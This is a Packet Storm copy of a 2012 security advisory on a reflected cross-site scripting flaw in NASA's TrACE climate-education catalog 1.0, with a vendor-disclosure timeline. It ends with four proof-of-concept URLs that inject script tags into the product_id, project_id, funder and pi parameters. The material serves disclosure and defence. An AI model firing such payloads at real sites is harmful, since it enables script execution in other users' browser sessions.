exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

NASA Tri-Agency Climate Education (TrACE) 1.0 XSS

NASA Tri-Agency Climate Education (TrACE) 1.0 XSS
Posted Oct 26, 2012
Authored by LiquidWorm | Site zeroscience.mk

The Tri-Agency Climate Education (TrACE) Catalog provides search and browse access to a catalog of educational products and resources. TrACE focuses on climate education resources that have been developed by initiatives funded through NASA, NOAA, and NSF, comprising a tri-agency collaboration around climate education. The application suffers from a reflected cross site scripting vulnerability when input is passed to the 'product_id', 'pi', 'project_id' and 'funder' GET parameters in 'trace_results.php' script which is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Version 1.0 is affected.

tags | exploit, arbitrary, php, xss
SHA-256 | a8958302bb602beff4ebb5517ad18454b487ae666d4353e85526aec09144e0a6

NASA Tri-Agency Climate Education (TrACE) 1.0 XSS

Change Mirror Download

NASA Tri-Agency Climate Education (TrACE) v1.0 Multiple XSS Vulnerabilities


Vendor: NASA
Product web page: http://www.nasa.gov
Affected version: 1.0

Summary: The Tri-Agency Climate Education (TrACE) Catalog provides search and
browse access to a catalog of educational products and resources. TrACE focuses
on climate education resources that have been developed by initiatives funded
through NASA, NOAA, and NSF, comprising a tri-agency collaboration around
climate education.

Desc: The application suffers from a reflected cross-site scripting vulnerability
when input is passed to the 'product_id', 'pi', 'project_id' and 'funder' GET parameters
in 'trace_results.php' script which is not properly sanitised before being returned
to the user. This can be exploited to execute arbitrary HTML and script code in a
user's browser session in context of an affected site.

Tested on: Apache/2.2.21
PHP 5.2.17


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Zero Science Lab - http://www.zeroscience.mk


Vendor status:

[03.10.2012] Vulnerabilities discovered.
[03.10.2012] Initial contact with the vendor.
[04.10.2012] No reply from vendor.
[05.10.2012] Tried contacting the vendor again.
[12.10.2012] No reply from vendor.
[13.10.2012] Last try contacting the vendor.
[15.10.2012] Vendor replies stating that the problem is solved?!
[16.10.2012] Replied to vendor that no problems are solved because no details were sent nor problems explained.
[17.10.2012] Vendor decides to talk serious and asks for details, cynically.
[18.10.2012] Sent detailed information and PoC files to the vendor.
[22.10.2012] Asked vendor for status report.
[22.10.2012] No reply from vendor.
[23.10.2012] Vendor silently patches the application (v2.0).
[23.10.2012] Asked vendor to have proper communication.
[25.10.2012] No reply from vendor.
[25.10.2012] Pointed out to the vendor about disclosure policy and ethical communication.
[26.10.2012] Public security advisory released.


Advisory ID: ZSL-2012-5111
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5111.php



03.10.2012



PoC:
----


- https://www.example.com/trace/trace_results.php?product_id=117"><script>alert(1);</script>&project_id=40&funder=31&pi=43
- https://www.example.com/trace/trace_results.php?product_id=117&project_id=40"><script>alert(2);</script>&funder=31&pi=43
- https://www.example.com/trace/trace_results.php?product_id=117&project_id=40&funder=31"><script>alert(3);</script>&pi=43
- https://www.example.com/trace/trace_results.php?product_id=117&project_id=40&funder=31&pi=43"><script>alert(4);</script>
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close